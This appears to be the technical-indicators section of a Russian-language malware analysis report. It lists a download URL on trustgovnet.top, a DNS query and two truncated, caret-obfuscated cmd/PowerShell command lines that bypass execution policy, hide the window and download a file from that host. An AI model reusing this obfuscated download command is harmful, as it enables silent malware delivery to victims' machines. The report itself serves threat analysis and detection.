Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWER^sH^ell^.E^xe^ ^-^exec^U^T^iONp^oLiCy BYpA^sS -NOpRofILE^ -WIn^DOWST^yLE HiDdEN^ ^(^NEW-^O^bj^ec^T ^SYS^tEm.nEt.weBC^Lie^nT^)^.^D^Ow^NlOA^dFILE^('http://trustgovnet.top/se...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /C "poWER^sH^ell^.E^xe^ ^-^exec^U^T^iONp^oLiCy BYpA^sS -NOpRofILE^ -WIn^DOWST^yLE HiDdEN^ ^(^NEW-^O^bj^ec^T ^SYS^tEm.nEt.weBC^Lie^nT^)^.^D^Ow^NlOA^dFILE^('http://trustgovnet.top/se...' (со скрытым окном)